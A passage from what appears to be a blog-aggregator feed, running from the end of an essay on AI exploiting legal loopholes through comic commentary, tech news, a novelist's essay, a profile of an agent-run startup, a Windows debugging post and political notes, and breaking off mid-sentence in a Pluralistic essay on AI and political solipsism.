The results will be much worse than insecure computers. Tax loopholes result in less revenue collected by governments, and regulatory loopholes allow the powerful to skirt the rules, both of which have all sorts of social ramifications. And while software vendors can patch their systems in days, it generally takes years for a country to amend its tax code. And that process is political, with lobbyists pressuring legislators not to patch. Just look at the carried interest loophole, a US tax dodge that has been exploited for decades. Various administrations have tried to close the vulnerability, but legislators just can’t seem to resist lobbyists long enough to patch it.

AI technologies are poised to remake much of society. Just as the industrial revolution gave humans the ability to consume calories outside of their bodies at scale, the AI revolution will give humans the ability to perform cognitive tasks outside of their bodies at scale. Our systems aren’t designed for that; they’re designed for more human paces of cognition. We’re seeing it right now in the deluge of software vulnerabilities that these models are finding and exploiting. And we will soon see it in a deluge of vulnerabilities in all sorts of other systems of rules. Adapting to this new reality will be hard, but we don’t have any choice.

This essay originally appeared in The Guardian.

11:28

Grrl Power #1460 – Chemical opposites [Grrl Power]

Edit: Okay, I fixed the typo in panel 2, and I did another pass on the looked-like-a-strap-on in panel 3. It was admittedly a little distracting once it was repeatedly pointed out. I don’t blame you guys. It did look like Sciona was about to give him what for.

How do Sciona’s bangs get longer when her hair is down? Magic, probably. Don’t worry about it.

Deus sure gets a lot of mileage out of that “I’m going to be a jerk but it’s because I respect you so much” bit. He used it on Maxima, though I honestly couldn’t tell you what page that was. Ironically, the more intelligent the person is, the fewer times he could pull it off with them, even if he was being mostly sincere.

You know, if Sciona… sorry, if Escorpia really was a sicario/narcotraficante, she probably would have had a lot more tattoos than just the… temple tattoo? It’s more like a “mohawk negative space tattoo.” Not that I’m aware of any comprehensive audit of female merc/drug runner tattoo coverage. I guess Sciona lucked out that Escorpia was content with just the one on her skull. Presumably if she can permanently change her hair color and length with a spell, she could probably remove or at least hide tattoos. Really the only reason she still had the one on her head under the hair she was growing out was for you guys’ benefit. (guys’s?)

Sciona usually does not “take smug.” She’s murdered for a lot less than that. But Deus is too important of a potentially exploitable resource to her. He’s also pretty good in bed, which isn’t a deciding factor, but it is a factor. She knows that if she killed him, the Alari from the colony ship would almost definitely assume control of Galytn, which would probably be both good and bad for her plans, and Deus can more or less run interference for her regarding them.

Sciona’s original final line was “I am seriously reconsidering fucking you.” Which I think is more pithy than what I changed it to, (Actually the very first draft read “sleeping with you” but that didn’t feel right either) but the more I thought about it, the more it sounded like she was planning on sleeping with him for his sake, like some sort of transactional reward. I suppose for being good at it the last time, maybe? So not some selfless sacrifice on her part, certainly, but there was something vaguely “It’s a man’s world, and I’m very sexy, which is mostly for the benefit of men, and he deserves his prize” in the sentiment. Yes, it’s possible to over analyze these things, but it doesn’t hurt to occasionally step back and do a paradigm check. The comic is mostly female characters, and while I certainly can’t claim any special insight into the female mind, I do at least attempt to consider that perspective… Even if a lot of them do have fairly typically male behaviors and hobbies. But I write what I know, and would the comic would be any better if I did some deep dive into typically feminine hobbies so Sydney could launch into the occasional dissertation about… quilting? Not that women couldn’t be into literally any hobby, of course, but the point of all this would have been to “feminize” some of the female characters, and saying that Harem is into restoring vintage tractors doesn’t really accomplish that. Although… she was raised on a farm… Hmm.

Anyway, I edited Sciona’s lines mostly because I don’t want all the characters to sound the same, and my first draft felt more sit-commy, and less “sociopathic blood mage.”

I sort of feel guilty when I post a page with only 4 panels. I mean, not that guilty, but for all I gripe about cramming way too many panels on a page and having to draw tiny faces, when I get to the occasional page that just wouldn’t benefit from wedging three more panels in there, it does feel a bit… light? Oh well, I’ll get over it.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament Quarter finalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon, (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:49

Cats & Dogs [Seth's Blog]

A dog gets fed and thinks his person is an omniscient, benevolent being.

A cat gets fed and thinks it is.

How we see ourselves in this analogy is actually up to each of us, every day. It also tells us a bit about how we think about customers, vendors, and partners.

02:35

[$] LWN.net Weekly Edition for May 14, 2026 [LWN.net]

Inside this week's LWN.net Weekly Edition:

  • Front: Fedora AI; Forgejo "carrot" disclosure; memory-management maintainership; huge THPs; mshare; 64KB base pages; DAMON; direct map.
  • Briefs: Dirty Frag; Fragnesia; Mythos and curl; killswitch; Debian reproducible builds; KDE investment; Quotes ...
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Wednesday, 13 May

23:35

GNUtrition 0.33.0rc2 Now Available [Planet GNU]

A test release of GNUtrition, 0.33.0rc2, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release makes some fixes to the gender option.  It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:


Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

23:14

The Myriad [Penny Arcade]

We will return to our regularly scheduled spelunking of our nearly thirty-year archive soon, but Playground Games banning Forza Horizon 6 pirates for thousands of years was too funny to leave alone. We had to strike - if for no other reason than I got to make up like four new terms. I got to bear fruit. That's what I'm trying to do every time! I'm tryna stay bulbous.

23:07

Page 13 [Flipside]

Page 13 is done.

22:42

The Big Idea: Sam Beckbessinger [Whatever]

We’ve all got a beast inside us, waiting to be unleashed. For some, they never hold it back. For others, they keep it caged until it can be repressed no longer. Enter author Sam Beckbessinger, whose fury led to the creation of her newest novel, Femme Feral.

SAM BECKBESSINGER: 

My new novel Femme Feral didn’t grow out of a Big Idea so much as an emotion, or rather, the lack of one. 

About a decade ago I was walking around Cape Town on my way to a friend’s birthday. It was one of those perfect picnic-dress days, a spring-in-your-step song-in-your-heart kind of summer afternoon. Then I realised some dude was following me. I did the things all women do. Reached into my handbag and clutched my keys. Scanned for easy exit routes or an open shop I could dash into. Sped up my walk, but not too much, because you don’t want to over-react or trigger his prey drive. This wasn’t the first time I’d been followed, obviously, but something about this time was different. I wasn’t only afraid, I was furious. I’d been having a lovely day until this creep ruined it! And I found myself having a fantasy I’d never had before: that I could reach into my bag and pull out a gun, turn to him, and make him feel afraid.

This was a shock. I’ve never been an angry person. I hate guns and I loathe violence. So much so, I’ve wondered before whether something was wrong with me. Spend time with any toddler and you’ll see that fury’s a foundational human emotion, yet it’s one I’ve barely ever felt. I’ve been a lifelong good girl, empathetic, nurturing, forgiving – sometimes to my detriment. I started to wonder, what happens to feelings you never feel? Are they still there somewhere inside of you, hidden, waiting? Do they mutate? And when they do finally come roaring out, will they be uglier for having been locked away for so long? 

Femme Feral grew out of those questions. It’s the story of a hypercompetent tech executive in her forties who thinks she’s going through perimenopause, but she’s actually turning into a werewolf. She doesn’t realise it, but once a month, she transforms into a violent beast who savagely mauls everyone who pisses her off in her waking life. The problem is, sometimes it’s the people you love who hurt you the most. Oh, also, there’s an obsessive monster-hunter on her trail – an eighty-four year old vigilante named Brenda who’s trying to find the creature that killed her cat.

The perimenopause part was fun to write, because that’s a joke about how the medical industry still somehow, in 2026, knows about as much about perimenopause as it knows about lycanthropy. When I wrote it, I was myself approaching forty, seeing the first signs of my own oncoming werewolf era (perimenopause usually begins earlier than most people think!). I can’t tell you how many of my friends I’ve seen go to the doctor to get help for a range of confusing midlife symptoms and instead of being given any actual help, the doctor suggests maybe they should try losing some weight. 

But the gorgeous thing about midlife is that it’s also – for many of us – the age our lifelong coping strategies begin to fail, and we’re forced to reckon with everything we’ve been repressing. Anger is an unacceptable emotion in women, so many of us repress it or transform it into something else. The beautiful thing about midlife, for many of us, is that our bodies no longer allow us to do that. Some of us have quite exciting breakdowns that lead to healthy realisations and overdue dramatic life changes; some of us lure our toxic bosses into an alleyway and rip their intestines out. Whatever a girl’s got to do.

This is exactly what I love so much about horror: how it allows you to speak the language of metaphor and play with our most primal emotions. It amuses me, too, that the werewolf is one of the most stubbornly masculine of monsters in our culture because we still find it impossible to imagine women as uncontrollably violent (there are some glorious exceptions, of course, from Ginger Snaps to Alan Moore’s “The Curse” to Rachel Yoder’s Nightbitch). 

Unlike my previous novel Girls of Little Hope, which I co-wrote with my friend Dale Halvorsen and which we carefully planned and outlined before writing a word of prose, the first draft of Femme Feral came out of me in a hot stinking vomit (almost like … it had been curdling inside of me all this time). The first draft was a half-formed hideous thing, which I then spent several years pulling into the shape of a novel. Many spreadsheets were involved, since control is my coping mechanism of choice. 

I had a blast taking a wild premise and then trying to work through the consequences very seriously. If you could rip someone’s head off, whose head would tempt you first? What would an NHS GP say if you told him that once a month you find yourself naked and covered in blood on the other side of town with no memory of how you got there? And the question that probably vexed me more than any other (and John Landis never had to deal with): how the heck is this beast roaming all around modern London without being spotted by CCTV?

The process of writing this story was deeply therapeutic for me. I’m not sure I’ve fully worked out exactly what I think about anger, but a novel’s not a polemic so it doesn’t require you to have an argument. It only requires you to have some questions, and then to get in touch with the parts of yourself that might be asking them. In my case, that was a furious beast I had been telling myself wasn’t even there. 

—-

Femme Feral: Amazon (US)|Barnes & Noble|Bookshop|Powell’s|UK 

Author socials: Website|Instagram

22:21

Haiku gets basic SMP support for ARM64, and unveils its GSoC projects: Bluetooth improvements incoming [OSnews]

The months, they don’t stop coming, so here’s another progress report for Haiku, our beloved successor to BeOS, the best operating system ever made. This past month the team’s added basic support for SMP on ARM64 (enough to use it in QEMU), the MIME sniffer’s internals have been overhauled for some serious performance gains, and a long list of smaller, but no less important or impactful, changes. Beta 6 still seems to be a ways off due to a number of unfixed bugs and an upcoming WebPositive release, but my usual spiel applies: you don’t need to wait for a beta to test Haiku. It’s stable enough as it is, and a nightly release will do you just fine, including updating to newer nightlies and application releases.

This past month also saw which projects Haiku’s GSoC people will be working on. Two projects will focus on improving Haiku’s Bluetooth stack, including adding HFP profile support and support for HID devices, as well as general Bluetooth improvements across the board. The third and final project will focus on improving and expanding Haiku’s Devices application to turn it into a real management utility along the lines of those available on many other modern operating systems.

21:35

EU weighs restricting use of US cloud platforms to process sensitive government data [OSnews]

The European Union is considering rules that would restrict its member governments’ use of U.S. cloud providers to handle sensitive data, sources familiar with the talks told CNBC.

↫ Kai Nicol-Schwarz at CNBC

The fact that this has only just become a possible reality now, and not decades ago, is beyond me, but better late than never, I suppose. The Americans voted en masse (not voting is a vote for the winner!) for Trump twice, and there’s no indication they won’t vote for such an anti-Europe basket case again. Their opinions and attitudes towards Europeans are clear: they dislike us deeply, and after the last few years, there’s no going back. Violating trust is easy; restoring it takes decades. Relying on the Americans for our digital infrastructure is, therefore, a monumentally stupid and self-defeating idea.

Of course, many members states are addicted to the cloud services from Google, Microsoft, and Amazon, so there’s going to be many individual member states who simply won’t reduce their dependency on the Americans of their own volition. My own country of origin, The Netherlands, only recently signed off on the sale of its government ID services company and associated personal data to an American company, despite the vast majority of the Dutch House of Representatives telling them not to. As such, it makes sense for the EU to step in and simply making it illegal to hand over sensitive data to the Americans.

Of course, we’ve got a long way to go, and I’m sure many of any possible proposed restrictions will be watered down considerably by pressure form major member states. Addiction is a harsh disease.

20:35

18:42

Ryan Carson Is a One-Person Code Factory [Radar]

Ryan Carson has built companies for 25 years, including Treehouse, which taught over a million people to code. He knows what it takes to grow a team. So when he told me he’d raised $2 million in seed funding for his latest company, Untangle, an AI-powered divorce assistant, and had no plans to hire anyone, I wanted to understand what that actually looks like.

Ryan stopped writing code professionally around 2008. He’d essentially been “abstracted away” from it by the responsibilities of running a funded startup, as he put it. Following the acquisition of Treehouse and inspired by the arrival of large language models, he decided to teach himself to code again with ChatGPT. Ryan learned Next.js, a framework he’d never touched, using AI as a tutor that was wrong often enough to keep him honest but patient enough that he could go as slowly as he needed.

He shipped something. It didn’t work commercially, so he moved on, but he still learned a lot about iterating on AI products in the process. A few years later, when he had an idea for a divorce tool born out of watching his family members struggle through difficult splits, he was ready to build a real MVP, and he did it all by himself (with a little design help along the way).

As one of the foremost proponents of companies led by a single founder running a team of agents, in some sense, Ryan is a prince from another country. Maybe it’s not immediately apparent how his current workflow is relevant to developers working for big corporations beyond efficiency gains with AI-assisted coding. But thinking bigger picture, what Ryan calls the “code factory”—a system where agents write and review the code, run the tests, triage the error reports, and monitor the production environment, under his oversight—may be an early version of what a lot more organizations will look like in five years.

The loop is the thing

What makes the code factory model possible, Ryan explained, is the ability to set up automations and skills for jobs that you know that you need to be doing every day. In other words, you’re teaching an agent to do a repeatable process. The underlying pattern is the iterative loop, and Ryan was an early proponent and popularizer of Geoffrey Huntley’s “Ralph Wiggum” approach.

The name comes from a Simpsons character who is, to put it charitably, not the sharpest. The idea is that you don’t need the agent to be superintelligent. You need it to do one thing, write down what it did and what it learned, stop, and restart with that notebook in hand. As Ryan pointed out, it turns out that pretty good intelligence, a loop, some instructions, and a notebook gets you surprisingly far into complex territory. Or to use another of Ryan’s analogies:

Think of it as a notebook where it’s like, “Here are the things I’ve done. And here’s the holes I fell into.” It’s like Memento, the movie, where [the main character] tattoos himself or uses notes to remember, like, “What did I do yesterday and what did I learn?” And agents are the same. They don’t have any long-term memory. And so [Geoffrey Huntley] figured out, yeah, this loop actually works shockingly well. It’s very primitive, this idea. And eventually after a number of these iterations, you actually get pretty complex outcomes.

When I heard this I thought of my first exposure to shell programming and how I fell in love with loops. You have a repetitive task and you want to do it many times, and computers are good at that. The language has changed, though; it’s English now instead of Bash. But the logic hasn’t: do something; save the result; do it again.

The skill I use to generate first drafts of posts like this reads the transcript, summarizes it, and suggests possible video clips to extract. I built it with a different sort of loop, iteratively training Claude to write more like me by rewriting its drafts, asking it to analyze the differences, and then feeding back the differences as a SKILL.md file, repeating until the gap narrowed enough to reduce the amount of time it takes to accurately reflect my own takeaways.

Ryan brought up an important point: skills decay. A Next.js skill from six months ago may conflict with your current component library. Two skills may say opposite things. He told me he’d gladly pay for a system that audits his skills library, flags conflicts, and surfaces what’s gone stale. Anyone can write a skill that’s useful in the moment. The value is in keeping the skill current and coherent as it interacts with the code factory’s complete workflow.

The code factory in practice

I asked Ryan to show us his daily workflow to give us a peek into the code factory. He shared a screen with 15 active threads running in Devin (at a monthly token burn of $2,000–$3,000). As Ryan explained, having a tool like Devin is the key to the code factory model. He’d started by “hand-cobbling” together a system with a Ralph Wiggum loop and a skill, but it was fragile and things broke or got out of sync. He needed a more durable system to run the cron jobs and nightly automations that keep the factory humming. He picked Devin, but ultimately choosing a direction was more important than the choice itself:

If you back up and say, How is the modern code factory happening? It’s choosing a tool that allows you to have automations and skills for jobs that you know that you need to be doing every day.

And he’s since expanded that toolset to cover product requirements beyond software engineering, like design.

What you can automate, and what you can’t

One of the threads Ryan had open was an end-to-end smoke test that signs up for his own app every morning, runs through the full onboarding flow, exercises all 14 tools, and records a video of itself doing it. Every morning he wakes up to a report. The test passed or it didn’t, and if it didn’t, here’s what failed. He has a separate Devin automation that reads Sentry every morning, and if it finds something problematic, spins up another Devin to fix it.

This is what a CTO does: reads the Datadog and Sentry reports, triages what matters, and points the team at it. Ryan has automated the reading and the triaging. He still decides what to do about the things that matter, but the number of things he has to pay attention to has been compressed dramatically.

Ryan’s figured out how to automate many of the responsibilities he hired for in his previous companies. Another automation runs against his Google Ads, Meta, and X spend, compiles a performance report on cost per click, lead generation, click-through rate. He reads that the way a head of marketing would read it.

There’s one thing he hasn’t been able to automate: what he should build. As we hear again and again, the efficiency gains in coding, testing, design iteration, and monitoring don’t replace the judgment calls about which problems matter. As Ryan noted, “There isn’t a magic wand still. You can build faster, but whether you’re building the right thing, and doing it better is something [else].”

Programming isn’t going away

We all need to keep pushing back on the narrative that programming is going away. When I started, I wrote assembly language programs. I was literally moving data from registers, multiplying values, low-level operations that nobody does manually anymore because the compiler handles it all. When we look back on that, we don’t think “programmers became unnecessary.” We understand that programming was just abstracted to a higher level, and became more powerful for it. That’s where we are again.

Ryan used the analogy of a carpenter switching from a handsaw to a Sawzall. It saves a ton of time, but you still need to know which pipes you’re cutting or you’re going to have a bad day. The domain knowledge doesn’t get abstracted away with the tool.

The people who are going to do well are the ones who bring genuine domain expertise to what they’re asking agents to do. Ryan knows divorce law well enough to evaluate whether the output is right. He knows enough about software to catch when the agent has gone off the rails. The agent amplifies what you already know; it can’t supply what you don’t.

What happened when he pitched an attorney

Ryan’s company is built for people considering or going through a divorce who find the process too expensive and too hard. But he always expected attorneys to have opinions. As he put it, “Either they would hate us and see us as the grim reaper, or they would love us because we’re going to save them costs.” So he had his AI agent, whom he calls R2, find and book meetings with small family law firms to hear them out. The feedback was very positive (from lawyers at least; paralegals may have another opinion). Here’s how one legal business owner responded to his pitch:

The truth is, I have a lot of overhead from folks that are more in the paralegal space. And it sounds like your tool will do all that work. And I would rather have attorneys on staff that are doing the real legal work and then have all the paralegal work done by AI. I would love to pay you for that.

I expect that’s where most of the near-term displacement happens. Lower-value overhead gets automated and professionals spend more of their hours on actual professional work.

Sometimes there’s an economic tradeoff between job losses (bad for those who lose their jobs) and lower costs that can be passed on to consumers. A lot of people who need legal help with a divorce can’t afford it, so they get stuck in a bad marriage. If the cost of the process comes down because the overhead is lower, some of those people get served who currently aren’t. There’s a big difference in economic impact between a business just saving costs and pocketing the savings and one that passes those savings along to consumers or uses them to radically improve access.

AI’s supporting role

Late in our conversation, someone asked how you use AI to identify strategic opportunities. Ryan’s answer was practical: build a priority map of the projects and people that matter to you, then run a cron job every 15 minutes to triage your inbox and Slack through that map, surface what’s relevant, and act. Ryan calls it his AI chief of staff, and he’s even open-sourced it as Clawchief.

My framing is a little different, and it comes from a conversation I had years ago with Jeff Jonas, who has done data work for national intelligence agencies and casino security systems. His dream was a system where the query lives in the same space as the data. Rather than going looking for things, you define what matters to you and the system watches for it. New data shows up and the query is already there, waiting. Jeff was talking about that long before agents were a concept, but it describes what a well-designed agent loop can do now.

Only you yourself will be able to fully understand the strategic opportunity moments for your company. What AI can do for you is be a scout. It can surface things that you should be paying better attention to. That’s what Jeff and Ryan are both talking about (Steve Yegge too): an agent that watches the flow and surfaces what deserves your attention rather than one that tries to make decisions for you.

Right now, there’s this incredible opportunity to try things out and see what sticks. As Ryan has shown, it doesn’t take an entire company. Identify your goal and opportunity, then start building. His advice: Don’t worry about trying out every new tool. Just “find an energetic system,” then “pick a lane and invest.”

18:28

The case of the hang when the user changed keyboard layouts [The Old New Thing]

A customer reported that their program hung when the user changed keyboard layouts, say by using the Win+Space hotkey sequence. They debugged it as far as observing that the foreground window in their application received a WM_INPUT­LANG­CHANGE­REQUEST, and when that message was passed to Def­Window­Proc, the call never returned. What’s so haunted about the WM_INPUT­LANG­CHANGE­REQUEST message?

What’s so haunted about it is that the default behavior of the WM_INPUT­LANG­CHANGE­REQUEST message is to change input language!

For historical (and therefore now compatibility) reasons, when a hotkey-initiated input language change request is accepted, the system applies the change to all threads of that process. This means that all UI threads of the process need to be pumping messages so that they can receive the notification that their keyboard state has changed.

In this case, the customer had a background thread that created a window but was not pumping messages. That prevented the language change from completing and caused the main UI thread to hang.

The customer wanted to know if there was a way to configure their program so that hotkey-initiated input language changes don’t require all threads to be pumping messages. But that’s trying to solve too narrow a problem. If your thread has created a window, then it must pump messages. Today it’s causing trouble with input language changes. Tomorrow, it’s going to cause problems with DDE, and the day after tomorrow, it’s going to cause problems with theme changes.

Even if you had a way to change the way language changes work, that’s just one of the problems that your non-responding thread is causing. You should fix the root cause: Either pump messages or destroy the window so that it is no longer a UI thread and is no longer obligated to pump messages.

The post The case of the hang when the user changed keyboard layouts appeared first on The Old New Thing.

18:21

Israel's violation of the "cease fire" in Gaza [Richard Stallman's Political Notes]

Israel agreed to a "cease fire" in Gaza, but violates it in several ways. In fact it is only a reduction in the frequency of atrocities.

Resisting construction of datacenters [Richard Stallman's Political Notes]

Resisting the construction of datacenters for pretend intelligence is not mere nimbyism. They are the only aspect of pretend intelligence that people have a chance to oppose.

*In the words of the antitrust expert Zephyr Teachout: "If you want democratic governance of AI [sic], block datacenters. Google's not coming to any democratic table, not listening to any rules, without people showing force."*

I see one other point where we can resist — by refusing to call it "intelligence".

Critically low snowpack [Richard Stallman's Political Notes]

* Data from missions showing critically low snowpack on mountains across the west raises alarm among experts.*

This problem of global heating was predicted many years ago. We could have prevented some of the dryness if we had made a global effort.

Barring cops from involvement in extremist groups [Richard Stallman's Political Notes]

*Chicago Ordinance Would Bar Cops from Active Involvement in Extremist Groups.*

Every state should enact such a law, and so should the federal government, if we ever pry it lose from violent extremists in the federal government.

Demands for higher taxes on billionaires [Richard Stallman's Political Notes]

*Pity the poor billionaires – demands for higher taxes must feel hurtful.*

And biased! Don't forget the unfairness of increasing the tax rate only for the super-rich ;-!

17:35

[$] Friction in Fedora over AI developer desktop initiative [LWN.net]

A push by Red Hat employees to create a Fedora "AI Developer Desktop" with support for out-of-tree kernel drivers and AI toolkits has been met with objections from some long-time members of the Fedora community. After more than a month of sometimes heated discussion, the Fedora Council had voted to approve the initiative; however, a last-minute change to vote against the proposal by council member Justin Wheeler has (at least temporarily) sent it back to the drawing board.

17:28

Pluralistic: Billionaire solipsism, dictator solipsism, AI, and the fascist paradigm (13 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



An aerial image of the planned city of Levittown, tinted light green. A circuit board bleeds through the open spaces on the town plan. Hovering over the town are Trump's disembodied, bloodshot eyes, in pouchy orange nests. Orange tentacles swarm over the town.

Billionaire solipsism, dictator solipsism, AI, and the fascist paradigm (permalink)

With great power comes great solipsism: the more power you wield over other people, the less real they become to you. To rule is to see people as aggregates, statistical artifacts, as a means to an end. It's how people seem when you're at the bottom of a k-hole.

Per Granny Weatherwax, this is the root of all evil: "Sin is when you treat people like things":

https://brer-powerofbabel.blogspot.com/2009/02/granny-weatherwax-on-sin-favorite.html

The problem (for powerful people) is that other people aren't things; they're people, with stubborn attachments to their own priorities and needs. This is a huge problem for social media bosses, since the force that keeps you stuck to their platforms is your love of your friends, which sucks (for social media bosses), because your friends refuse to organize their interactions with you to "maximize engagement." There is a group of platform users who are dedicated to maximizing your engagement: performers (which is why legacy social media platforms have reduced the quantum of your feed given over to your friends to a bare minimum and swapped in the amateur dramatics of theater kids). But even "influencers" demand treatment as people, not things (which is why legacy social media is squeezing out performers in favor of slop):

https://pluralistic.net/2026/04/17/for-youze/#forever

Running a social media service is especially solipsism-inducing, since the back-end of a social media service always reduces people to statistical artifacts to be steered, thwarted, or rewarded based on the degree to which they are "maximizing engagement." No wonder zuckermuskian social media bosses mythologize themselves as dopamine-hacking wizards who've built a mind-control ray. Skinnerism and solipsism fit together very neatly, seducing you into the belief that everyone else is a stimulus-responding automaton, programmed to think they have free will:

https://pluralistic.net/2025/05/07/rah-rah-rasputin/#credulous-dolts

(Of course, the AI boss version of this is the belief that everyone else is a "stochastic parrot":)

https://xcancel.com/sama/status/1599471830255177728

But in truth, any corporate boss is prone to solipsism. To maximize corporate profits, you must view other people – employees, suppliers and customers – as inconvenient problems to be solved, not true people with feelings and needs that are co-equal with your own.

This is why AI is so attractive to the ruling class. For corporate leaders, the fantasy of your own worth is always dangerously close to collapsing, due to the haunting knowledge that if you don't show up for work, everything continues as per normal; while if your workers don't show up for work, the shop closes down and stays closed. Bosses really want to be in the driver's seat, but ultimately they know that they're strapped into the back seat, playing with a Fisher Price steering wheel. AI is a way to wire that toy steering wheel directly into the drive-train: it's the fantasy that a boss can have an idea and the corporation will execute it, without any messy human needs or demands getting in the way:

https://pluralistic.net/2026/01/05/fisher-price-steering-wheel/#billionaire-solipsism

Solipsism is why bosses fetishize IP and ignore process knowledge. IP is the part of the job that the worker can explain (and that you can train an AI model on). Process knowledge is the part of the job that can't be abstracted, alienated or commodified. The very existence of process knowledge is the major impediment to de-skilling workers so they can be interchanged with other, more desperate, more timid workers (or with sycophantic AI):

https://pluralistic.net/2025/09/08/process-knowledge/#dance-monkey-dance

Of course, there's a whole group of powerful people outside of the political world who are gripped by solipsistic AI fantasies: politicians. Like social media bosses, politicians deal with people as statistical artifacts who respond to policy inputs with semi-predictable outputs:

https://en.wikipedia.org/wiki/Seeing_Like_a_State

And of course, politicians have their own detested class of workers whom they fantasize about replacing with chatbots: bureaucracies. When Trump et al bemoan the "deep state," they are engaged in the politicians' version of the corporate boss's solipsism: "I make policies, but to enact them, I have to convince civil servants to turn my agenda into action. This sucks. Can't we just have an all-powerful executive who decides on things and then those things just happen?"

Writing for Columbia's Knight First Amendment Institute, political scientist Henry Farrell and statistician Cosma Rohilla Shalizi have produced the definitive account of how AI psychosis has infected our political classes:

https://knightcolumbia.org/content/ai-as-social-technology

Farrell and Shalizi use this political AI psychosis to explain DOGE, framing DOGE as a project where politicians and their loyal vassals cut a deep wound in the administrative state on the basis that general AI was about to emerge. With godlike AI around the corner, these bureaucrats – who insist on having opinions based on long experience and ethical sensibilities – could be replaced with sycophantic chatbots who'd turn the will of the unitary executive into policy without any filtration through unreliable, squishy humans.

This is a political version of my maxim that "the fact that an AI can't do your job doesn't stop an AI salesman from convincing your boss to fire you and replace you with an AI that can't do your job." Private sector bosses are easy marks for AI salesmen, and not just because they want to reduce their wage bills, but also because it will fulfill the solipsist's fantasy of a corporation that turns the singular genius of the boss into a product without any messy demands from workers (and, if you're Zuckerberg and convinced that you've created a mind-control ray, your product can be rolled out without any messy demands from your customers, either, since you've hypnotized them into doing as they're told).

The public sector version of this is the fantasy that you can eliminate the civil service and use an army of chatbots to do the job – not merely as a way of slashing the federal budget, but also as a way of purifying the transfer of the leader's will to the people without any intervening loss of fidelity resulting from the need to have your policies interpreted (and willfuly misinterpreted) by bureaucrats.

This is a very important framing, and it explains why fascists like Trump and dead-eyed technocrats like Canadian Prime Minister Mark Carney are hell-bent on gutting their countries' civil service and replacing it with chatbots:

https://policyoptions.irpp.org/2026/04/carney-ai-government-risks/

This is how Muskism and DOGE connect to Trumpism and AI: Musk doesn't believe other people are real. He calls them "NPCs" (non-player characters). He wants to put a microchip in your head so he can "replace your bad programming":

https://pluralistic.net/2026/04/21/torment-nexusism/#marching-to-pretoria

It's the fascist paradigm: the idea that people are incapable of self-rule, save for a very small number of singular geniuses who should be put in a position of absolute authority over all of us, to keep us safe from our own foolish impulses:

https://pluralistic.net/2026/05/12/donella-meadows/#paradigmatic

The Technocrats – a protofascist Italian movement that once captured the imagination of Musk's great-grandfather, and now are frequently quoted and alluded to by the likes of Mark Andreessen – were addicted to the quantitative fallacy that infects economics and other disciplines. That's the idea that every social process can be expressed as a mathematical model, which can then be optimized.

The problem, of course, is that much of the real world is qualitative, and the act of quantizing those qualia is a very lossy process. To quantize a qualitative question is to incinerate all the qualitative aspects and then do mathematics on the dubious quantitative ash that is left behind:

https://locusmag.com/feature/cory-doctorow-qualia/

In their paper, Farrell and Shalizi cite Ben Recht's maxim that "you can’t optimize a trade-off":

https://www.argmin.net/p/are-there-always-trade-offs

But of course, we optimize trade-offs all the time. That's what being a boss means, and it's also at the very core of self-determination: the right to decide what trade-offs you want to make. What Recht means is "you can't optimize a trade-off for everyone else." Those stubborn not-quite-people – customers, workers, bureaucrats – insist that they want different trade-offs.

In translating the will of a supreme leader to policy without any intervening need for buy-in by humans, fascist projects like DOGE seek to optimize trade-offs according to the preferences of the supreme leader. AI in government is grounded in the idea that a sufficiently deserving leader can be trusted to vibe-code the entire apparatus of state, checked only by his own sense of rightness:

https://thehill.com/policy/international/5680714-trump-morality-international-law/

Farrell and Shalizi forcefully make the point that statecraft is not a set of discrete problems with provably correct answers that must be solved. Government is a matter of making choices between mutually exclusive policies that have benefits and costs, and those costs and benefits fall upon different groups differently.

The idea that you can simply feed every fact about a society into a chatbot and order it to "solve" the nation reveals a profound ignorance about the nature of political contests. There's no empirical way of deciding whose priorities deserve to be realized and who must be disappointed. There isn't even an empirical way to compare the benefits that one group receives to the costs another group pays.

What's more, any system that uses LLMs to make high-stakes tradeoffs between different societal priorities will be relentlessly targeted by the groups that stand to win or lose based on those decisions, and by bureaucrats whose careers depend on making the number go up. They will poison the LLMs' training data, and figure out how to trick it into deceiving their bosses about the situation on the ground.

Back in 2018, Yuval Harari predicted that LLMs would supercharge dictatorships by overcoming "authoritarian blindness" – when the suppression of political opinion is so effective that the first sign that a dictator has of his waning support is a mob that burns the presidential palace down. This prediction failed, because people who live under dictators have switched all the energy they used to use to put on a good show for the secret police into putting a good show on for the chatbots:

https://pluralistic.net/2023/07/26/dictators-dilemma/#garbage-in-garbage-out-garbage-back-in

Meanwhile, the "variability" introduced by bureaucrats who adapt political policies is a feature, not a bug. When a long-tenured public official receives a directive from on-high that they know will be a disaster if implemented unchanged, they can tweak the policy so that it is at least partially successful.

Fire that bureaucrat and hand the policy to a rigidly loyal LLM that will not deviate from its strict instructions and you will end up with nothing (rather than a perfect policy implementation). Indeed, you may end up with less than nothing, as resentful local populations sabotage your agenda.

Both Hayek and Marx agreed that people at the very periphery of the system have insights into local conditions that no boss/central planner can know (though they disagreed about what that fact implied). An LLM is the ultimate micro-manager, and government by Computer Says No would only work if the person writing the system prompt knew everything about everyone everywhere.

As Farrell and Shalizi write,

